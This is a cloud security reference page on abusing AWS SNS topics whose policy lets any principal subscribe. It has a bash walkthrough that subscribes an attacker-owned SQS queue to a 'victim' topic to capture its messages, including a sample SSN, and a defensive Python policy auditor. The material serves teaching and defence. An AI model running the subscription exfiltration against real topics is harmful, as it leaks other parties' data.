AWS - SNS Unauthenticated Enum
SNS
For more information about SNS check:
Open to All
When you configure an SNS topic from the web console, you can indicate that Everyone can publish and subscribe to the topic.
So if you find the ARN of topics inside the account (or by brute forcing potential topic names) you can check whether you can publish or subscribe to them.
This is equivalent to the SNS topic resource policy allowing sns:Subscribe to * (or to external accounts): any principal can create a subscription that delivers all future topic messages to an SQS queue they own. When the queue owner initiates the subscription, no human confirmation is required for SQS endpoints.
Example (us-east-1)
```bash
REGION=us-east-1
# Victim account (topic owner)
VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)

# Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"OpenSubscribe","Effect":"Allow","Principal":"*","Action":"sns:Subscribe","Resource":"$VICTIM_TOPIC_ARN"}]}
JSON
aws sns set-topic-attributes --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --attribute-name Policy --attribute-value file:///tmp/topic-policy.json

# Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue --queue-name attacker-exfil-queue-$(date +%s) --region $REGION --query QueueUrl --output text)
ATTACKER_Q_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON
{"Version":"2012-10-17","Statement":[{"Sid":"AllowVictimTopicSend","Effect":"Allow","Principal":{"Service":"sns.amazonaws.com"},"Action":"sqs:SendMessage","Resource":"$ATTACKER_Q_ARN","Condition":{"ArnEquals":{"aws:SourceArn":"$VICTIM_TOPIC_ARN"}}}]}
JSON
aws sqs set-queue-attributes --queue-url "$ATTACKER_Q_URL" --region $REGION --attributes Policy="$(cat /tmp/sqs-policy.json)"

# Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --protocol sqs --notification-endpoint "$ATTACKER_Q_ARN" --query SubscriptionArn --output text)

# Validation: publish and receive
aws sns publish --region $REGION --topic-arn "$VICTIM_TOPIC_ARN" --message {pii:ssn:123-45-6789}
aws sqs receive-message --queue-url "$ATTACKER_Q_URL" --region $REGION --max-number-of-messages 1 --wait-time-seconds 10 --query Messages[0].Body --output text
```
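A defender-side check for the policy condition described above, as an added example that is not part of the original page: it parses a topic policy and reports Allow statements that grant sns:Subscribe or sns:Publish to * without a scoping condition, or to an account other than the topic owner. The function name, the list of scoping condition keys, and the sample account IDs and topic name are assumptions made for illustration.

```python
import fnmatch
import json
import re

RISKY = ("sns:subscribe", "sns:publish")
# Condition keys treated as scoping a wildcard principal (heuristic, not exhaustive).
SCOPING = {"aws:sourceowner", "aws:sourceaccount", "aws:sourcearn",
           "aws:principalorgid", "aws:principalaccount"}

def _listify(value):
    return value if isinstance(value, list) else [value]

def _aws_principals(stmt):
    principal = stmt.get("Principal", {})
    if isinstance(principal, str):
        return [principal]
    return [str(p) for p in _listify(principal.get("AWS", []))]

def audit_topic_policy(policy_json, owner_account):
    """Return (sid, action, principal) for Allow statements exposing Subscribe/Publish."""
    findings = []
    for stmt in _listify(json.loads(policy_json).get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        patterns = [a.lower() for a in _listify(stmt.get("Action", []))]
        hits = [r for r in RISKY if any(fnmatch.fnmatchcase(r, p) for p in patterns)]
        cond_keys = {k.lower() for op in stmt.get("Condition", {}).values() for k in op}
        for principal in _aws_principals(stmt):
            account = re.search(r"\d{12}", principal)
            exposed = (not (cond_keys & SCOPING) if principal == "*"
                       else bool(account) and account.group() != owner_account)
            if exposed:
                findings += [(stmt.get("Sid", ""), hit, principal) for hit in hits]
    return findings

# Constructed sample policy; account IDs and topic name are placeholders.
OWNER = "111111111111"
ARN = f"arn:aws:sns:us-east-1:{OWNER}:example-topic"
SAMPLE = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "OpenSubscribe", "Effect": "Allow", "Principal": "*",
     "Action": "sns:Subscribe", "Resource": ARN},
    {"Sid": "OwnerOnly", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": ["SNS:Subscribe", "SNS:Publish"], "Resource": ARN,
     "Condition": {"StringEquals": {"AWS:SourceOwner": OWNER}}},
    {"Sid": "Partner", "Effect": "Allow", "Action": "sns:*", "Resource": ARN,
     "Principal": {"AWS": "arn:aws:iam::222222222222:root"}}]})

if __name__ == "__main__":
    print(audit_topic_policy(SAMPLE, OWNER))
```

The input is the Policy attribute returned by `aws sns get-topic-attributes` for each topic in the account; a wildcard statement carrying a condition is treated as scoped without evaluating the condition's value, so review those by hand.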

